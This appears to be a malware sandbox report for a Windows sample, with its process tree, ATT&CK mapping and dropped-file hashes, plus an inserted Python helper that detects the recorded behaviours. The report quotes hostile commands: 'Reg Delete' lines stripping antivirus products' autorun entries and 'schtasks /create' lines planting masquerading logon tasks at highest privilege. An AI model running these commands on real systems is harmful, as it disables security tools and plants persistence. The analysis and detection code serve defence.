"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )4⤵
-
C:\Users\Admin\AppData\Local\Temp\8EFA.exe
C:\Users\Admin\AppData\Local\Temp\8EFA.exe (depth 1)
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\8EFA.exe
C:\Users\Admin\AppData\Local\Temp\8EFA.exe (depth 2)
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\942B.exe
C:\Users\Admin\AppData\Local\Temp\942B.exe (depth 1)
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 732 (depth 2)
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 748 (depth 2)
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 716 (depth 2)
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 892 (depth 2)
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 860 (depth 2)
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\9B60.exe
C:\Users\Admin\AppData\Local\Temp\9B60.exe (depth 1)
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\A0B0.exe
C:\Users\Admin\AppData\Local\Temp\A0B0.exe (depth 1)
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe (depth 1)
-
C:\Windows\explorer.exe
C:\Windows\explorer.exe (depth 1)
-
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe (depth 1)
-
C:\Windows\explorer.exe
C:\Windows\explorer.exe (depth 1)
-
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe (depth 1)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exe
C:\Windows\explorer.exe (depth 1)
-
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe (depth 1)
-
C:\Windows\explorer.exe
C:\Windows\explorer.exe (depth 1)
-
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe (depth 1)
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\odt\explorer.exe'" /rl HIGHEST /f (depth 1)
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\PerfLogs\ShellExperienceHost.exe'" /rl HIGHEST /f (depth 1)
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "8563" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\8563.exe'" /rl HIGHEST /f (depth 1)
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\SysWOW64\WimBootCompress\WerFault.exe'" /rl HIGHEST /f (depth 1)
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default\Recent\csrss.exe'" /rl HIGHEST /f (depth 1)
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\PerfLogs\OfficeClickToRun.exe'" /rl HIGHEST /f (depth 1)
- Process spawned unexpected child process
- Creates scheduled task(s)
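The two behaviours the process tree records, the cmd.exe block that runs `Reg Delete` against the Run keys of a dozen security products and the six `schtasks /create` calls that register ONLOGON tasks named after Windows binaries but pointing at C:\odt, C:\PerfLogs, C:\Users\Default\Recent and a Temp directory, can be picked out of a process tree mechanically. The Python below is an added example written for this page; it is not part of the sandbox's tooling or of the sample. The table of genuine binary locations and the list of unusual drop directories are assumptions about a default Windows 10 install, and the sample command lines are copied from the report above, with the registry block cut down to four of its entries.

```python
"""Triage helper for the reg.exe and schtasks.exe command lines that a sandbox
process tree records. Added example for this write-up, not part of the sandbox
or of the sample; standard library only, runs offline.

Two checks, one per behaviour seen in the process tree above:
  1. `Reg Delete` against a ...\CurrentVersion\Run key: a security product's
     autorun entry is being removed (ATT&CK: Disabling Security Tools).
  2. `schtasks /create` whose action binary borrows a Windows binary name but
     lives outside the path that binary ships in (ATT&CK: Scheduled Task, with
     masquerading), or sits in a temp directory or an unusual drop location.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Genuine locations (lowercase, full path) of the binary names the sample
# imitates. Assumed baseline for a default Windows 10 install; extend it for
# your own environment.
EXPECTED_PATHS = {
    "explorer.exe": {r"c:\windows\explorer.exe", r"c:\windows\syswow64\explorer.exe"},
    "csrss.exe": {r"c:\windows\system32\csrss.exe"},
    "werfault.exe": {r"c:\windows\system32\werfault.exe", r"c:\windows\syswow64\werfault.exe"},
    "shellexperiencehost.exe": {
        r"c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe"},
    "officeclicktorun.exe": {
        r"c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe"},
}
# Directories that rarely host a legitimately scheduled binary (assumed list;
# the sample used the last two of them).
UNUSUAL_DROP_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\perflogs\\")

RUN_KEY_DELETE = re.compile(
    r'reg\s+delete\s+"(?P<key>[^"]*\\currentversion\\run)"\s+/v\s+"(?P<value>[^"]+)"'
    r"(?:\s+/f)?(?:\s+/reg:(?P<view>32|64))?",
    re.IGNORECASE,
)
SCHTASKS_CREATE = re.compile(r"schtasks(?:\.exe)?\s+/create\s+(?P<args>.*)", re.IGNORECASE)
# /tn, /tr, /sc and /rl take a "quoted" or bare value; /f takes none.
SWITCH = re.compile(r'/(?P<name>tn|tr|sc|rl)\s+(?:"(?P<q>[^"]*)"|(?P<u>\S+))', re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    technique: str
    detail: str


def run_key_deletions(cmdline: str) -> list[tuple[str, str, str]]:
    """Every Run-key value deleted by `cmdline`, as (key, value name, registry view)."""
    return [
        (m["key"], m["value"], f"{m['view']}-bit" if m["view"] else "native")
        for m in RUN_KEY_DELETE.finditer(cmdline)
    ]


def parse_schtasks_create(cmdline: str) -> dict[str, str] | None:
    """Switches of a `schtasks /create` call, or None if `cmdline` is not one."""
    m = SCHTASKS_CREATE.search(cmdline)
    if m is None:
        return None
    args = {}
    for s in SWITCH.finditer(m["args"]):
        value = s["q"] if s["q"] is not None else s["u"]
        args[s["name"].lower()] = value.strip("'")  # /tr "'path'" nests quotes
    return args


def task_reasons(task: dict[str, str]) -> list[str]:
    """Why a scheduled task looks like persistence; an empty list means nothing odd."""
    reasons = []
    path = task.get("tr", "")
    low = path.lower()
    base = low.rsplit("\\", 1)[-1]
    if base in EXPECTED_PATHS and low not in EXPECTED_PATHS[base]:
        reasons.append(f"{base} masquerade, runs from {path}")
    if "\\temp\\" in low or low.startswith(UNUSUAL_DROP_PREFIXES):
        reasons.append(f"action binary in a temp or unusual drop directory: {path}")
    if task.get("sc", "").upper() == "ONLOGON" and task.get("rl", "").upper() == "HIGHEST":
        reasons.append("runs at every logon with the highest available privileges")
    return reasons


def triage(cmdlines: list[str]) -> list[Finding]:
    """Run both checks over a list of command lines and collect the findings."""
    findings = []
    for cmd in cmdlines:
        for key, value, view in run_key_deletions(cmd):
            findings.append(Finding("Disabling Security Tools",
                                    f"{value} deleted from {key} ({view} view)"))
        task = parse_schtasks_create(cmd)
        if task is not None and (reasons := task_reasons(task)):
            findings.append(Finding("Scheduled Task",
                                    f"task '{task.get('tn', '?')}': " + "; ".join(reasons)))
    return findings


# Command lines copied from the process tree above; the registry block is cut
# down to four of its entries.
SAMPLE_CMDLINES = [
    r'''Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 '''
    r'''Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 '''
    r'''Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 '''
    r'''Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64''',
    r'''schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\odt\explorer.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\PerfLogs\ShellExperienceHost.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "8563" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\8563.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\SysWOW64\WimBootCompress\WerFault.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default\Recent\csrss.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\PerfLogs\OfficeClickToRun.exe'" /rl HIGHEST /f''',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_CMDLINES):
        print(f"[{f.technique}] {f.detail}")
```

The masquerade check is deliberately an exact-path comparison rather than a directory prefix: the sample's fake WerFault.exe sits under C:\Windows\SysWOW64\WimBootCompress, which a prefix test on C:\Windows\SysWOW64 would wave through. The ONLOGON plus HIGHEST reason is a weak signal on its own and is only meant to add weight to the other two.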
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
- Modify Existing Service (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
Defense Evasion
- Modify Registry (3)
- Disabling Security Tools (1)
- Virtualization/Sandbox Evasion (1)
- Install Root Certificate (1)
Downloads
-
C:\ProgramData\Data\Database.exe
MD5 30f0a5fe731fd2735b8c196fd0fe91cf
SHA1 2eb63724fd11bf8e082bcd99301654111ad0d831
SHA256 13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512 acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\install.exe
MD5 3319cb474eaa2f3812956b271ff29635
SHA1 74fbed926e8de14fa5eb6a5a47fb873def72fb81
SHA256 79d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a
SHA512 c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347
-
C:\ProgramData\Runtimebroker.exe
MD5 e06bf78c03d9593b593cc3ab09794d29
SHA1 7e62e808689f789c153c895c8061a44503bfccb2
SHA256 e097a312c40c9422a674553bad792cb07acebf24a864766c1b88e62609756177
SHA512 330b30933e375806c8e0ab1b94872bd2352c9f0a16d8852e735a6265a4da21b7bc4151ba04d51398008781e83993a6ef0b2d120b9dab1cf46d66562b9d4d8d45
-
C:\ProgramData\Systemd\HostData.exe
MD5 cbf26c74a0a12b5f17ba7596ff6ad19f
SHA1 6dc733432c290f1fbf5ddda2571b7f538445202b
SHA256 095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983
SHA512 8a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b
-
C:\ProgramData\Systemd\config.json
MD5 a285ac140c8c6806223bfdc02302173e
SHA1 06ca61cae058c568860858e49615d04dc4a8820d
SHA256 36d5713cc13ea15449ab8defc943e42cc657b503a79f0859600ea275598441eb
SHA512 f82eae8304aa9ba504eba0e96468fdac08420b0e158c3263a4f47474b02fb5f751b1bd2335e71a33341d81a495083c7dd8e0479e2c48dbaf6a3f7fefb9f4054b
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5 c558fdaa3884f969f1ec904ae7bbd991
SHA1 b4f85d04f6bf061a17f52c264c065b786cfd33ff
SHA256 3e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e
SHA512 6523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5 968b0bb38e66c0fb89c7dbe8d9d3eddb
SHA1 728a021af94e4e1c54eabd0f5809dc1c9a93e737
SHA256 dbdd714d26d37f247ae9cb43fa0835cfb7a8c7131717991ff835ee49ca944927
SHA512 f7a155bad79bd28cdbcd301ed1ff52b3e71d643656bdd2eb485aa7bc55c726a492fda6d51574b8c225b3b946ab10c1fca778fda012c1e3e60a74909401c25638
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5 a146e5dea51bdd0f757d04b4f64bf2bb
SHA1 432125e6ba72a10f1102e22a7bdec573256735d8
SHA256 464f4d869e5e5c8a16d84234e4182ae6633f9ccd35cc4352855da417a2ffb61d
SHA512 f82f0fd65c94d3901a54878bb62aad2acbd813f57e9e1cc3f555da404fb20c7ebc702234cc097ed39f784f2acd0e36df85ea0b18277410783905a8666492cf11
-
C:\Users\Admin\AppData\Local\Temp\7CC7.exe
MD5 e987477b0d14b6d7075f0105aa28ba92
SHA1 54bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA256 4fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512 bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\8563.exe
MD5 49f58a80993170b4351014d0b5068897
SHA1 7af2615ec10821cbefb55c602b270c27fa1d6806
SHA256 905f70426483e7dc4e4d2110cfa0f3a3bbac1ee16a74e287cd51cae0e0babd1c
SHA512 2ee7f30ee68bbc9da4f3858d1eb188be3fca547f63b36864181b86a70ea5d06f614fdb38b42a22aff24e8d4d720f814b6b103e52d5c01c399eefd28775f88ae2
-
C:\Users\Admin\AppData\Local\Temp\898B.exe
MD5 e06bf78c03d9593b593cc3ab09794d29
SHA1 7e62e808689f789c153c895c8061a44503bfccb2
SHA256 e097a312c40c9422a674553bad792cb07acebf24a864766c1b88e62609756177
SHA512 330b30933e375806c8e0ab1b94872bd2352c9f0a16d8852e735a6265a4da21b7bc4151ba04d51398008781e83993a6ef0b2d120b9dab1cf46d66562b9d4d8d45
-
C:\Users\Admin\AppData\Local\Temp\8EFA.exe
MD5 5707ddada5b7ea6bef434cd294fa12e1
SHA1 45bb285a597b30e100ed4b15d96a29d718697e5e
SHA256 85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA512 91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\942B.exe
MD5 4fb208ec7d17d1ba04dd724693231c5e
SHA1 d2861fd7a1463d5bbbf6154d7c82d4dbff6112d5
SHA256 6dfc2d77895bc8653a3a5ef24b97484ace1f716231abd88045e9e08fea2bd449
SHA512 172aa75c8d4737e91d611af37bfeaa2ad4063f7a9d630215161db32a384d71d8852bbf7114369d8a886ad7eb966b20661e40db1599733e23da393bcfd04692a6
-
C:\Users\Admin\AppData\Local\Temp\9B60.exe
MD5 b9a734ea84f2d88b6be300332ccc3543
SHA1 59d8534b8a2e0148a9fca945f10428a82424e475
SHA256 881583cc1f60373ad9cacb46a0cf431a710ce5b6d573fcb7109f70dd8781e77c
SHA512 38fbe208a9003c189f3f01c419f576a3908a58b426d24e8d38ee2af990a131fd29501163776b55d619220a5c3e871c6532fdc90face782195ec1c5c874b502af
-
C:\Users\Admin\AppData\Local\Temp\A0B0.exe
MD5 d3ddcff47d32b16b82d53a1d45ba26bd
SHA1 8d2be1dafd57b82ddf709971b590c762436205bc
SHA256 f83f5f862a96201504c3f06966d12b26e71403477537d41b575b939bba02aa76
SHA512 2e53ffb2c666480605d9a17a8752a0035d25a41cde5f3ba59a4cd394539b85ad3ed39bf0ba7ee075f743d3df6f474b2537e6dccd973fe780461a76b75ffb29ec
-
C:\Users\Admin\AppData\Local\Temp\is-3PUS4.tmp\7CC7.tmp
MD5 6da8ef761a1ac640f74c4509a3da8b47
SHA1 de626da008e5e8500388ec7827bcd1158f703d98
SHA256 232fb3aecf0becf95a9d8e820939fb1043a3401d9fd953da7ba13cbab0086ff5
SHA512 c9e8c6ae521dbd7e92af06e8a3581835058667ff6b502aa55ff4993c1b639e896c8f3ab6e0ca105e5635a66a40d92b4db96512e2ed337268b76ed611155e2402
-
C:\Users\Admin\AppData\Local\Temp\is-5UNKH.tmp\7CC7.tmp
MD5 6da8ef761a1ac640f74c4509a3da8b47
SHA1 de626da008e5e8500388ec7827bcd1158f703d98
SHA256 232fb3aecf0becf95a9d8e820939fb1043a3401d9fd953da7ba13cbab0086ff5
SHA512 c9e8c6ae521dbd7e92af06e8a3581835058667ff6b502aa55ff4993c1b639e896c8f3ab6e0ca105e5635a66a40d92b4db96512e2ed337268b76ed611155e2402
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe
MD5 cf8114289d40ec83b53463b1ac8930c9
SHA1 00036a509bc31c4264a0414d3386f420854ca047
SHA256 39b7e686bb324ecf81adc0b6a165830cd4d3f7d8a2bbba310930fa023f95bb12
SHA512 e19af0dcf1aa8253523a1eba1c69f5f26cc63730ef630c60c4ce46d368b037753110426c7e3db333041046dbb04ccffec2bfd48529e1cdaab6547e331df02fc9
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\libfreetype-4.dll
MD5 96f1c8a9c83fbf6411f35d3de8fdc77c
SHA1 41b590133df449c8e0ce247aab7def7cfc39399d
SHA256 ae8db0fc9690c6047bd1d1aeb7cd254060c0623700bb184ce3f1b3d1daffc39e
SHA512 fa214f15b7c77eca2760aa2489debc5d7244f5535a7b725b49ae7f9ba6f5341a04ee2ccabe15f1e70a542582ed64758d1b4e2d61faaacf2a56e3ec750df76baa
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_004844.txt
MD5 4f3d687bceb908d223c17af91bf2cf57
SHA1 f728eaa7c44703a8a9a22225eafe7c9f4f15c4bd
SHA256 8193dd717657246008b334988f44378dd7cfae3dfa438a9efaad57bd1e59707c
SHA512 ef71a08bba054d8da9f37ec7ee9fc2feae84ba3e22fd749b2f61dd2a2a7ee07434fa37a39004c4a5c4b9bf48acfd1cbbca6063bdf0534c3687c698f26dfe675c
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_004846.txt
MD5 9b70d19386d571fb1c7dc00d83139f9d
SHA1 d870f42ab62461c24824f69d27c76a22613fa400
SHA256 824a10f12c290aae261da967ea3cc6b8816c40e752f76e22a0b33f0967b87495
SHA512 3ad305fba3c8534f83fc10f80024d16c66f32d6c342f5d351314a63d8d1b41e41eeb10726ec861854e6a8b484817a15bf2d47c6ee95719dd3ffa5fd5af10f43a
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_004847.txt
MD5 57b7b5b0ef99d73e5566f0da47a52438
SHA1 c0ec5a0cc8a0d88b97007e37d1cc224615aa4afa
SHA256 ab085f739e380ef96c1a4e9f456870b4ee2d27b2e5b061e7f286b9bd00f979f3
SHA512 8da0860373b1a06770913e2c734224322bc151f69d614ecd9bfcca88e4b4fdb19a5fd7819301d7e2e200d884948cb8dd2d835228a64bc030995e250654ca379d
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_004849.txt
MD5 0e2a3ab62686362d654a0b7c9ae47918
SHA1 a060686494e13295fadbb622804d6cafee531ac3
SHA256 46d0c12caece39079198b4c9bddce3462e48d0eaad96f29260365e3254355a2e
SHA512 e7c47d02154bccebb1159a13c3f522ba0dd595067dc2aa7824d223a0d35cba74f521bb2c4bb1303208bfb3d51d902cad5216f6df742cd56ec3826d3b539f52cf
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_004851.txt
MD5 78a7b768b67abd6df6e0f298fba471b3
SHA1 121c038d265e57d73e91c0f87888f10e1fdfa40b
SHA256 766814c2d46d38f81e323e95a63451f80a6661a6a88a237d7bd4b2f0b00402e2
SHA512 8ac9d6b1f197aeb050d63de46f3bc2574445acba143c927d0aa0f301bc71756138971cf0401c731adae5add0eb732b907bbfc83a43fe0ad8c8ffbbffb28a1c08
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_004852.txt
MD5 f3ede72a6b7c12af67d58509f274db77
SHA1 06b012516185e47715ae7cce569aea3b6fc95f49
SHA256 89a32509833beb1dcfcf591366919382f17c55cc73d6b0a45cbebb73d53154cf
SHA512 62a7be8d9b96544e7ea00785e003758b9771abc449228e9ee35ec5942a6516f3d6569e2921befdf50c49350d5a49e2cdb6f80f3224b4663714c3f2f408b8000b
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_004853.txt
MD5 644a9e65b7e99f69fccefd603d09fe47
SHA1 b8eb73a095e743c50322d370fab47b9807c21767
SHA256 3b0eef0f3d804656243fc66a9bd5400487e8818f0ce9dc5ebfcc1815de0b87ea
SHA512 d49487448013fc943948e74adf095fc7abbec9a8dfce73c08c0926ed0800df74f37307451fb851c2e68933082218242ba8c871abb64de206a3bf1e2498bd370b
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_004854.txt
MD5 992ed9aa105abc675b0da0697bdb70e7
SHA1 f92639165c8983ca46d5ba11b461fe21bb5341cb
SHA256 97175bda182ace885b30e1098e5356be856ae10374caf1c131699426acdf8804
SHA512 3f798dd09d74b0c678c630631241a4e269283f9a92d95d3efe2a42022ca21035daf122ea343e3404fed309c6eef8a3bb58d8bc0afd893c75e0b740b831d08237
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_004856.txt
MD5 2e79bd6cb25fcbf188ba4e4433b52006
SHA1 d9a8de685e8064e81112224901fdb4b6c75d6382
SHA256 2b4a8fd878420b0c07843d357447bd54944fe834416f38a7d4e114fa0d655276
SHA512 80c9b36c0ae53e323a2a66ae713d21d5b917391b4a9f48ed0b2bc71860996e4005a20f6bfd2399ae0f3aeca9b8409b770545d81c2a32529b5877a99e678c7e6c
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_004859.txt
MD5 c86b8ca04c1db333e3c9562bac676d6c
SHA1 231f714c3ca13383d6f6b05bdf258a73e03fce5d
SHA256 d6a37150b1412d1e328b2d9f858e42cfe642d46ba12e6fb89e134c987989dd80
SHA512 8d492ef11522c16db167e42a23711db946ceebc7a8fc7b499feb9b230228c414791b6bb8c1b4f1bd8fdcb221698e3a24a757d3994c602b7a5450a020fe70d6b1
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_004901.txt
MD5 c9a4369ad19fbc9ebbc2cad54e56323e
SHA1 63b367a093ee70e24dc389dc8ec07cdaf3154e1d
SHA256 5d4c3bda596609679e1b93c2830bad1828187f37eaedd2d7756092acb63429f2
SHA512 13b52fcead558e0f9d15b3eb734cb7ebce94e59bddd1b57c43feac63287e7202a056142e75c3aa0158381a1fd1132842f8b0bf028ecc015d69163322e0f98b52
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\menu.xml
MD5 0ad63807522a2fc76deff4eddbc77d35
SHA1 85ba4baf1b1a623bc8fe5ea9334088de8da390c7
SHA256 f04362f73243736c636a08982e1f3655ce5824f2e5b0e3e87acbd94d0a906b96
SHA512 5cacea66310d6f8fc41cc742d6570e389e9df0f9faec4af2c8d036635500bfcf605148ec0a6e8d54b64485abb8a3881f00e7c93bbe7ab35eec85f39c6c33dac9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BI Video Controller for x86 systems\BI Video Controller for x86 systems.lnk
MD5 e843d2a139a9077e1e15ea5c4fee4374
SHA1 437be1d390bd46fabe9301e48af1a8d999af7f6d
SHA256 32de29c34dcc28f371bb446b640cfc6cc16bb0207dd7fde2623f5b78daeaecaa
SHA512 ad6ab1e1de1f4b3a1fdb069c1cd16268f98745de7952828a92ac658ba33840c068bcf0139c6e0c00fbb8cebd62f0d9e160a617b093b6aaeec19b5c1661c61f61
-
\??\c:\users\admin\appdata\local\temp\is-3pus4.tmp\7cc7.tmp
MD5 6da8ef761a1ac640f74c4509a3da8b47
SHA1 de626da008e5e8500388ec7827bcd1158f703d98
SHA256 232fb3aecf0becf95a9d8e820939fb1043a3401d9fd953da7ba13cbab0086ff5
SHA512 c9e8c6ae521dbd7e92af06e8a3581835058667ff6b502aa55ff4993c1b639e896c8f3ab6e0ca105e5635a66a40d92b4db96512e2ed337268b76ed611155e2402
-
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\freebl3.dll
MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01
-
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\mozglue.dll
MD5 eae9273f8cdcf9321c6c37c244773139
SHA1 8378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256 a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA512 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097
-
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\nss3.dll
MD5 02cc7b8ee30056d5912de54f1bdfc219
SHA1 a6923da95705fb81e368ae48f93d28522ef552fb
SHA256 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA512 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5
-
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\softokn3.dll
MD5 4e8df049f3459fa94ab6ad387f3561ac
SHA1 06ed392bc29ad9d5fc05ee254c2625fd65925114
SHA256 25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA512 3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6
-
\Users\Admin\AppData\LocalLow\sqlite3.dll
MD5 f964811b68f9f1487c2b41e1aef576ce
SHA1 b423959793f14b1416bc3b7051bed58a1034025f
